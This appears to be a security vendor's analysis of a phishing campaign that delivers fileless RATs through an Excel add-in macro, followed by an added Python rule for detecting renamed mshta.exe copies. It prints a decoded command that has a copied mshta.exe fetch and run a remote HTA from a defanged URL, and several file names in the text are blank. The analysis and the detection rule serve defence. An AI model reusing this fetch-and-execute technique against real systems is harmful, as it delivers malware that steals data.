Phishing Campaign Delivering Three Fileless Malware:

AveMariaRAT / BitRAT / PandoraHVNC

Fortinet’s FortiGuard Labs captured a phishing campaign that delivers three pieces of fileless malware onto a victim’s device. Once executed, they are able to steal sensitive information from that device.

In this analysis, I’ll reveal how the phishing campaign manages to transfer the fileless malware to the victim’s device, what mechanism it uses to load, deploy, and execute the fileless malware in the target process, and how it maintains persistence on the victim’s device.

Affected platforms: Microsoft Windows
Impacted parties: Microsoft Windows Users
Impact: Controls victim’s device and collects sensitive information
Severity level: Critical

Observing the Phishing Email

The captured phishing email is shown in Figure 1.1. It was disguised as a notification of a payment report from a trusted source.

Figure 1.1 – The phishing email

This email attempts to trick the recipient into opening the attached Excel document to see the report details. As you can see, this phishing email is detected as spam by the FortiMail service and has been marked as “[SPAM detected by FortiMail]” in the Subject line to warn the recipient.

Looking into the Attached Excel Document

The Excel document is named “Remittance-Details-951244.xlam”. It’s an Excel Add-In (*.xlam) file that contains malicious macros. When the recipient opens it in Microsoft Excel, a security notice pops up asking the user if they want to enable the macros, as shown in Figure 2.1.

Figure 2.1 – The security notice that launches when opening the Excel document

It contains an auto-start macro: a VBA (Visual Basic for Applications) method called “Auto_Open()” that runs automatically when the Excel file is opened.

Going through the VBA code inside the method, I learned that it decodes a command string and executes it using a WMI (Windows Management Instrumentation) object.

Figure 2.2 – The WMI object used to execute a decoded command

Figure 2.2 is a snippet of VBA code from the method “Auto_Open()”, showing where it is about to create a WMI object to execute the decoded command string “C:\ProgramData\ hxxps://taxfile[.]mediafire[.]com/file/6hxdxdkgeyq0z1o/APRL27[.]htm/file”, as shown at the bottom of Figure 2.2.

Before that, it copies a local file, “C:\Windows\System32\mshta.exe”, into “C:\ProgramData\” and renames it as “”. “mshta.exe” is a Windows-native binary file designed to execute Microsoft HTML Application (HTA) files. Remember that “C:\ProgramData\” is now the duplicate of “mshta.exe”, which will be used throughout the campaign. To confuse researchers, for example, it uses the copied “” file to download and execute the malicious html file rather than “mshta.exe”.
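Copying and renaming “mshta.exe” changes its path but not the version information embedded in the binary, which gives defenders a stable signal. The following is an added detection example, not code from the FortiGuard analysis: it checks process-creation events for an mshta.exe copy running under another name or location. It assumes Sysmon Event ID 1 field names (Image, OriginalFileName, CommandLine, ParentImage); `COPY_NAME.bin` is a placeholder because the page does not give the copied file’s name, and the sample events are constructed.

```python
import ntpath
import re

# Directories that hold the genuine mshta.exe on Windows.
TRUSTED_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

def findings(ev):
    """Reasons a process-creation event looks like a copied mshta.exe
    being used to fetch remote content. Empty list means nothing to report."""
    # The PE version resource survives a copy/rename; the path does not.
    if ev.get("OriginalFileName", "").lower() != "mshta.exe":
        return []
    directory, name = ntpath.split(ev.get("Image", "").lower())
    reasons = []
    if name != "mshta.exe":
        reasons.append("renamed")
    if directory not in TRUSTED_DIRS:
        reasons.append("relocated")
    if URL_RE.search(ev.get("CommandLine", "")):
        reasons.append("remote-url")
    # Assumption: a process started through WMI has WmiPrvSE.exe as parent.
    if ntpath.basename(ev.get("ParentImage", "")).lower() == "wmiprvse.exe":
        reasons.append("wmi-parent")
    return reasons

def severity(ev):
    """'high' for a renamed or relocated copy, 'medium' for the genuine
    binary loading a URL, None otherwise."""
    r = findings(ev)
    if "renamed" in r or "relocated" in r:
        return "high"
    return "medium" if "remote-url" in r else None

# Constructed sample events (not taken from the report). COPY_NAME.bin is a
# placeholder: the page does not give the name of the copied binary.
SAMPLE_EVENTS = [
    {"Image": r"C:\ProgramData\COPY_NAME.bin", "OriginalFileName": "MSHTA.EXE",
     "CommandLine": r"C:\ProgramData\COPY_NAME.bin https://example.invalid/a.htm",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe", "OriginalFileName": "MSHTA.EXE",
     "CommandLine": r"mshta.exe C:\Tools\inventory.hta",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "OriginalFileName": "Excel.exe", "CommandLine": "EXCEL.EXE",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(severity(ev), findings(ev), ev["Image"])
```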